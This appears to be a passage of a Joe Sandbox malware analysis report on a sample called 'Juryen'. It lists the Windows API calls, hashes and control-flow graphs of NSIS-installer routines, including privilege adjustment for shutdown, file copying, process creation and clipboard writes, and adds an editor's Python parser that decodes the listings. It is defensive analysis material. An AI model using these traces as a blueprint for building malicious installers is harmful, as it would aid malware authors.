                                                                      • Part of subcall function 00406541: lstrcpynW.KERNEL32(?,?,00000400,0040368E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040654E
                                                                    • wsprintfW.USER32 ref: 0040399B
                                                                    • GetFileAttributesW.KERNEL32(0042C800,00436800), ref: 004039CE
                                                                    • DeleteFileW.KERNEL32(0042C800), ref: 004039DA
                                                                    • SetCurrentDirectoryW.KERNEL32(00436800,00436800), ref: 00403A08
                                                                      • Part of subcall function 00406301: MoveFileExW.KERNEL32(?,?,00000005,00405DFF,?,00000000,000000F1,?,?,?,?,?), ref: 0040630B
                                                                    • CopyFileW.KERNEL32(00437800,0042C800,00000001,00436800,00000000), ref: 00403A1E
                                                                      • Part of subcall function 00405B24: CreateProcessW.KERNEL32(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
                                                                      • Part of subcall function 00405B24: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A
                                                                      • Part of subcall function 0040689E: FindFirstFileW.KERNEL32(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,00436800,00405C6D,?,771B3420,00436800), ref: 004068A9
                                                                      • Part of subcall function 0040689E: FindClose.KERNEL32(00000000), ref: 004068B5
                                                                    • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403A6C
                                                                    • ExitProcess.KERNEL32 ref: 00403A89
                                                                    • CloseHandle.KERNEL32(00000000,0042D000,0042D000,?,0042C800,00000000), ref: 00403A90
                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403AAC
                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AB3
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AC8
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AEB
                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B10
                                                                    • ExitProcess.KERNEL32 ref: 00403B33
                                                                      • Part of subcall function 00405AEF: CreateDirectoryW.KERNEL32(?,00000000,0040350F,00436800,00436800,00436800,00436800,00436800,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
                                                                    • String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
                                                                    • API String ID: 1813718867-2779336553
                                                                    • Opcode ID: 2207ca5d112a9a3364a8ba5a27e8e35ca5960dc45a954e7d111bf56b8d3c545f
                                                                    • Instruction ID: b6c3ecddbcec298392be70143bc2b9781a35be0696dc4cb4866b7eddd329dddd
                                                                    • Opcode Fuzzy Hash: 2207ca5d112a9a3364a8ba5a27e8e35ca5960dc45a954e7d111bf56b8d3c545f
                                                                    • Instruction Fuzzy Hash: A9F12370604311ABD720AF659D05B2B7EE8EF8570AF10483EF481B22D1DB7D9A45CB6E
                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(?,?,771B3420,00436800,00434000), ref: 00405C76
                                                                    • lstrcatW.KERNEL32(00424F10,\*.*,00424F10,?,?,771B3420,00436800,00434000), ref: 00405CBE
                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00424F10,?,?,771B3420,00436800,00434000), ref: 00405CE1
                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,00424F10,?,?,771B3420,00436800,00434000), ref: 00405CE7
                                                                    • FindFirstFileW.KERNEL32(00424F10,?,?,?,0040A014,?,00424F10,?,?,771B3420,00436800,00434000), ref: 00405CF7
                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D97
                                                                    • FindClose.KERNEL32(00000000), ref: 00405DA6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                    • String ID: \*.*
                                                                    • API String ID: 2035342205-1173974218
                                                                    • Opcode ID: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                    • Instruction ID: c1737a7785d2a2f908f5f44de07c4aee1227101a85bdbc8c56ed50a571596083
                                                                    • Opcode Fuzzy Hash: a58a7e6cf5cd5b323d99b2e7efe97abcbadf979a8ae7158d9cb99184f307206c
                                                                    • Instruction Fuzzy Hash: 3241C430800A14BADB216B65CD4DABF7678DF41758F14813BF802B21D1D77C4AC19EAE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                    • Instruction ID: db5d81fcbfa5be4a2d8af1487b95e9640f9c883cb1993a3fcb30b22963867ec5
                                                                    • Opcode Fuzzy Hash: c61fa70d481ae7decb37dc56cf27f7a4c6ea5b826eb98dd3ad332090416f9cd2
                                                                    • Instruction Fuzzy Hash: 87F17871D04229CBDF28CFA8C8946ADBBB0FF44305F25816ED456BB281D7786A86CF45
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(771B3420,00425F58,00425710,00405F61,00425710,00425710,00000000,00425710,00425710,771B3420,?,00436800,00405C6D,?,771B3420,00436800), ref: 004068A9
                                                                    • FindClose.KERNEL32(00000000), ref: 004068B5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID: X_B
                                                                    • API String ID: 2295610775-941606717
                                                                    • Opcode ID: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                    • Instruction ID: f67f359cedd367be1f2f51a398ada2a6aadcf11014009cc1af4821528039bb17
                                                                    • Opcode Fuzzy Hash: 368a1c0a689282c2aa5195ddf357efb180b92b440bed087baa82a07527058284
                                                                    • Instruction Fuzzy Hash: 68D0123251A5205BC64067396E0C84B7B58AF153717268A36F5AAF21E0CB348C6A969C
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 1F7561DA
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 1F7561E4
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 1F7561F1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: b600e752aa79a83286881f5113a8bcd596e694c7fba1240810562596ee2aa62b
                                                                    • Instruction ID: bc02963713d698f9d35e1527965f1be610fef31b4db8b0a35db460445d4498af
                                                                    • Opcode Fuzzy Hash: b600e752aa79a83286881f5113a8bcd596e694c7fba1240810562596ee2aa62b
                                                                    • Instruction Fuzzy Hash: 4A31B5B490132C9BCB61DF64D98878DBBB4AF48320F5041DAE81CA7260E730AB95CF45
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,?,1F754A8A,?,1F762238,0000000C,1F754BBD,00000000,00000000,00000001,1F752082,1F762108,0000000C,1F751F3A,?), ref: 1F754AD5
                                                                    • TerminateProcess.KERNEL32(00000000,?,1F754A8A,?,1F762238,0000000C,1F754BBD,00000000,00000000,00000001,1F752082,1F762108,0000000C,1F751F3A,?), ref: 1F754ADC
                                                                    • ExitProcess.KERNEL32 ref: 1F754AEE
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 3912071bd6e728b5a9ccbfd875e46586e413ab05e75a96799ad187f74eb56368
                                                                    • Instruction ID: be438933095a50664fa0f403d53532919025bca00bb7275a326fc9f28e204a94
                                                                    • Opcode Fuzzy Hash: 3912071bd6e728b5a9ccbfd875e46586e413ab05e75a96799ad187f74eb56368
                                                                    • Instruction Fuzzy Hash: 3FE0B636204258AFCF416FA4DD68E893B6AEF84361B104015F9098B531EB36E967CA58
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: HeapProcess
                                                                    • String ID:
                                                                    • API String ID: 54951025-0
                                                                    • Opcode ID: 0d9b6ad725c94599640a125f5931d62c793a25078af9c7ff042b1e1089414d14
                                                                    • Instruction ID: d1b3d0ffdad628da1fd3be8610a7e87dfe73cc7b5c215b97f6f7e4cc7414c6ff
                                                                    • Opcode Fuzzy Hash: 0d9b6ad725c94599640a125f5931d62c793a25078af9c7ff042b1e1089414d14
                                                                    • Instruction Fuzzy Hash: 43A012302002138FD3804E30428924C36AC66881B07000016D40CC0150E72184328600

                                                                    Control-flow Graph

                                                                    Control-flow graph rendering (basic blocks 405705-405a90; executed/not-executed colouring and edges not recoverable as text; called APIs are listed below)
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405763
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405772
                                                                    • GetClientRect.USER32(?,?), ref: 004057AF
                                                                    • GetSystemMetrics.USER32(00000002), ref: 004057B6
                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057D7
                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057E8
                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057FB
                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405809
                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040581C
                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040583E
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405852
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405873
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405883
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040589C
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058A8
                                                                    • GetDlgItem.USER32(?,000003F8), ref: 00405781
                                                                      • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004058C5
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005699,00000000), ref: 004058D3
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004058DA
                                                                    • ShowWindow.USER32(00000000), ref: 004058FE
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405903
                                                                    • ShowWindow.USER32(00000008), ref: 0040594D
                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405981
                                                                    • CreatePopupMenu.USER32 ref: 00405992
                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059A6
                                                                    • GetWindowRect.USER32(?,?), ref: 004059C6
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059DF
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
                                                                    • OpenClipboard.USER32(00000000), ref: 00405A27
                                                                    • EmptyClipboard.USER32 ref: 00405A2D
                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405A43
                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A77
                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
                                                                    • CloseClipboard.USER32 ref: 00405A88
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                    • String ID: {
                                                                    • API String ID: 590372296-366298937
                                                                    • Opcode ID: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                    • Instruction ID: 1ec4b4c3d0988b91a44b02e8c0f1a80d5eff4bd371306251f5288e66bb296ab7
                                                                    • Opcode Fuzzy Hash: 3824989ea0536e5c3d89d87b24ed579d9185aa06a8fa494c1d573172a0034d7b
                                                                    • Instruction Fuzzy Hash: 4FB139B1900608FFDB11AFA0DD89AAE7B79FB04354F40813AFA41B61A0CB744E51DF68
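Editor's note, not part of the Joe Sandbox output: the "APIs" listings in this part of the report print window-message IDs, clipboard formats and allocation flags as raw hex, so the purpose of a routine is not obvious at a glance. The Python helper below is an added worked example (not code from the report, the sandbox vendor or the sample). It parses lines in exactly the shape printed above (bullet, `Api.MODULE(args), ref: address`, including the indented "Part of subcall function" variant), resolves the Win32 constants that occur in these listings, and checks for the OpenClipboard / EmptyClipboard / SetClipboardData / CloseClipboard sequence of the function at 0x405705. Decoded, that routine reads list-view rows with LVM_GETITEMTEXTW and writes them to the clipboard as CF_UNICODETEXT; it writes the clipboard rather than reading it. The constant tables cover only values seen on this page, and the embedded sample is copied from the listing above; the control IDs and strings in these functions (`_Nb`, `RichEd20`, `Control Panel\Desktop\ResourceLocale`) are those of the open-source NSIS installer stub, which is the editor's reading and not something the report states.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# One "APIs" line of the listing, in either shape printed on this page:
#   • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
#   • EmptyClipboard.USER32 ref: 00405A2D            (no argument list)
# The indented "Part of subcall function 004044F5: ..." variant is also accepted.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)
HEX_ARG = re.compile(r"^-?[0-9A-Fa-f]{8}$")  # the plugin prints numbers as 8 hex digits

# Win32 constants (winuser.h / commctrl.h) for the values that occur in these listings.
LVM, TVM = 0x1000, 0x1100  # LVM_FIRST, TV_FIRST
WINDOW_MESSAGES = {
    0x0030: "WM_SETFONT", 0x00F3: "BM_SETSTATE", 0x00F4: "BM_SETSTYLE", 0x0200: "WM_MOUSEMOVE",
    0x0143: "CB_ADDSTRING", 0x0147: "CB_GETCURSEL", 0x014E: "CB_SETCURSEL",
    0x0150: "CB_GETITEMDATA", 0x0151: "CB_SETITEMDATA", 0x0443: "EM_SETBKGNDCOLOR",
    0x0401: "PBM_SETRANGE", 0x0409: "PBM_SETBARCOLOR", 0x2001: "CCM_SETBKCOLOR",
    LVM + 1: "LVM_SETBKCOLOR", LVM + 4: "LVM_GETITEMCOUNT", LVM + 36: "LVM_SETTEXTCOLOR",
    LVM + 38: "LVM_SETTEXTBKCOLOR", LVM + 54: "LVM_SETEXTENDEDLISTVIEWSTYLE",
    LVM + 97: "LVM_INSERTCOLUMNW", LVM + 115: "LVM_GETITEMTEXTW",
    TVM + 2: "TVM_EXPAND", TVM + 9: "TVM_SETIMAGELIST", TVM + 10: "TVM_GETNEXTITEM",
    TVM + 27: "TVM_SETITEMHEIGHT", TVM + 28: "TVM_GETITEMHEIGHT",
    TVM + 50: "TVM_INSERTITEMW", TVM + 63: "TVM_SETITEMW",
}
CLIPBOARD_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}
GMEM_FLAGS = {0x0002: "GMEM_MOVEABLE", 0x0040: "GMEM_ZEROINIT"}
CLIPBOARD_WRITE = ("OpenClipboard", "EmptyClipboard", "SetClipboardData", "CloseClipboard")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Union[int, str, None]]  # None where the plugin printed "?" (unresolved)
    ref: int                           # address of the call instruction
    caller: Optional[str]              # set for "Part of subcall function" entries


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    if HEX_ARG.match(tok):
        return int(tok, 16)
    return tok  # string literal such as "RichEdit20W" or "Function_00005699"


def parse_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue  # headings, hashes, memory-dump lines
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), m.group("caller")))
    return calls


def annotate(call: ApiCall) -> str:
    """Symbolic name of the argument that gives the call its meaning, or ''."""
    a = call.args
    if call.api == "SendMessageW" and len(a) > 1 and isinstance(a[1], int):
        return WINDOW_MESSAGES.get(a[1], f"msg 0x{a[1]:04X}")
    if call.api == "SetClipboardData" and a and isinstance(a[0], int):
        return CLIPBOARD_FORMATS.get(a[0], f"clipboard format {a[0]}")
    if call.api == "GlobalAlloc" and a and isinstance(a[0], int):
        names = [name for bit, name in GMEM_FLAGS.items() if a[0] & bit]
        return "|".join(names) or "GMEM_FIXED"
    return ""


def find_clipboard_write(calls: List[ApiCall]) -> Optional[str]:
    """Format written if Open -> Empty -> SetClipboardData -> Close occur in address order,
    else None. A clipboard *read* would show GetClipboardData instead."""
    pending = list(CLIPBOARD_WRITE)
    fmt = None
    for c in sorted(calls, key=lambda c: c.ref):
        if c.api != pending[0]:
            continue
        if c.api == "SetClipboardData":
            fmt = annotate(c) or "unknown format"
        pending.pop(0)
        if not pending:
            return fmt
    return None


# Constructed sample: the tail of the "APIs" list of the function at 0x405705, as printed above.
SAMPLE_LISTING = """
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A17
• OpenClipboard.USER32(00000000), ref: 00405A27
• EmptyClipboard.USER32 ref: 00405A2D
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A39
• GlobalLock.KERNEL32(00000000), ref: 00405A43
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A57
• GlobalUnlock.KERNEL32(00000000), ref: 00405A77
• SetClipboardData.USER32(0000000D,00000000), ref: 00405A82
• CloseClipboard.USER32 ref: 00405A88
  • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
"""
```

Usage: `for c in parse_listing(SAMPLE_LISTING): print(f"{c.ref:08X} {c.api} {annotate(c)}")` followed by `find_clipboard_write(parse_listing(SAMPLE_LISTING))`, which returns `"CF_UNICODETEXT"` for the sample. The sequence check sorts by the `ref` address because the report lists calls in address order only approximately (note the GetDlgItem at 00405781 printed after 004058A8 above), and it deliberately requires CloseClipboard so that a listing with only OpenClipboard, as a clipboard reader would also show, is not reported as a write.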

                                                                    Control-flow Graph (text export of the graph image: each entry gives the node id, the basic-block address range and the APIs called in that block; a->b marks an edge from node a to node b; the executed / not-executed colouring of the rendered graph is not preserved in this export)
                                                                    control_flow_graph 341 404f2d-404f79 GetDlgItem * 2 342 4051a4-4051ab 341->342 343 404f7f-405017 GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 341->343 344 4051ad-4051bd 342->344 345 4051bf 342->345 346 405026-40502d DeleteObject 343->346 347 405019-405024 SendMessageW 343->347 348 4051c2-4051cb 344->348 345->348 349 40502f-405037 346->349 347->346 350 4051d6-4051dc 348->350 351 4051cd-4051d0 348->351 352 405060-405064 349->352 353 405039-40503c 349->353 355 4051eb-4051f2 350->355 356 4051de-4051e5 350->356 351->350 354 4052ba-4052c1 351->354 352->349 359 405066-405096 call 4044c0 * 2 352->359 357 405041-40505e call 40657e SendMessageW * 2 353->357 358 40503e 353->358 360 405332-40533a 354->360 361 4052c3-4052c9 354->361 362 4051f4-4051f7 355->362 363 405267-40526a 355->363 356->354 356->355 357->352 358->357 395 405166-405179 GetWindowLongW SetWindowLongW 359->395 396 40509c-4050a2 359->396 370 405344-40534b 360->370 371 40533c-405342 SendMessageW 360->371 367 405525-405537 call 404527 361->367 368 4052cf-4052d9 361->368 372 405202-405217 call 404e7b 362->372 373 4051f9-405200 362->373 363->354 369 40526c-405276 363->369 368->367 376 4052df-4052ee SendMessageW 368->376 377 405286-405290 369->377 378 405278-405284 SendMessageW 369->378 380 40534d-405354 370->380 381 40537f-405386 370->381 371->370 372->363 394 405219-40522a 372->394 373->363 373->372 376->367 386 4052f4-405305 SendMessageW 376->386 377->354 387 405292-40529c 377->387 378->377 389 405356-405357 ImageList_Destroy 380->389 390 40535d-405364 380->390 384 4054e7-4054ee 381->384 385 40538c-405398 call 4011ef 381->385 384->367 400 4054f0-4054f7 384->400 413 4053a8-4053ab 385->413 414 40539a-40539d 385->414 398 405307-40530d 386->398 399 40530f-405311 386->399 401 4052ad-4052b7 387->401 402 40529e-4052ab 387->402 389->390 392 405366-405367 GlobalFree 390->392 393 40536d-405379 390->393 392->393 
393->381 394->363 403 40522c-40522e 394->403 408 40517f-405182 395->408 404 4050a5-4050ab 396->404 398->399 406 405312-40532b call 401299 SendMessageW 398->406 399->406 400->367 407 4054f9-405523 ShowWindow GetDlgItem ShowWindow 400->407 401->354 402->354 409 405230-405237 403->409 410 405241 403->410 411 4050b1-4050dc 404->411 412 405148-40515b 404->412 406->360 407->367 416 405184-405197 ShowWindow call 4044f5 408->416 417 40519c-40519f call 4044f5 408->417 419 405239-40523b 409->419 420 40523d-40523f 409->420 421 405244-405260 call 40117d 410->421 422 405118-40511a 411->422 423 4050de-405116 SendMessageW 411->423 412->404 427 405161-405164 412->427 428 4053ec-405410 call 4011ef 413->428 429 4053ad-4053c6 call 4012e2 call 401299 413->429 424 4053a0-4053a3 call 404efb 414->424 425 40539f 414->425 416->367 417->342 419->421 420->421 421->363 434 405130-405145 SendMessageW 422->434 435 40511c-40512e SendMessageW 422->435 423->412 424->413 425->424 427->395 427->408 441 4054b2-4054bb 428->441 442 405416 428->442 448 4053d6-4053e5 SendMessageW 429->448 449 4053c8-4053ce 429->449 434->412 435->412 444 4054c9-4054d1 441->444 445 4054bd-4054c3 InvalidateRect 441->445 446 405419-405424 442->446 444->384 452 4054d3-4054e2 call 404e4e call 404e36 444->452 445->444 450 405426-405435 446->450 451 40549a-4054ac 446->451 448->428 453 4053d0 449->453 454 4053d1-4053d4 449->454 456 405437-405444 450->456 457 405448-40544b 450->457 451->441 451->446 452->384 453->454 454->448 454->449 456->457 458 405452-40545b 457->458 459 40544d-405450 457->459 462 405460-405498 SendMessageW * 2 458->462 463 40545d 458->463 459->462 462->451 463->462
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404F45
                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404F50
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F9A
                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FB1
                                                                    • SetWindowLongW.USER32(?,000000FC,0040553A), ref: 00404FCA
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FDE
                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FF0
                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00405006
                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405012
                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405024
                                                                    • DeleteObject.GDI32(00000000), ref: 00405027
                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405052
                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040505E
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F9
                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405129
                                                                      • Part of subcall function 004044F5: SendMessageW.USER32(00000028,?,00000001,00404320), ref: 00404503
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040513D
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040516B
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405179
                                                                    • ShowWindow.USER32(?,00000005), ref: 00405189
                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405284
                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052E9
                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052FE
                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405322
                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405342
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00405357
                                                                    • GlobalFree.KERNEL32(?), ref: 00405367
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053E0
                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405489
                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405498
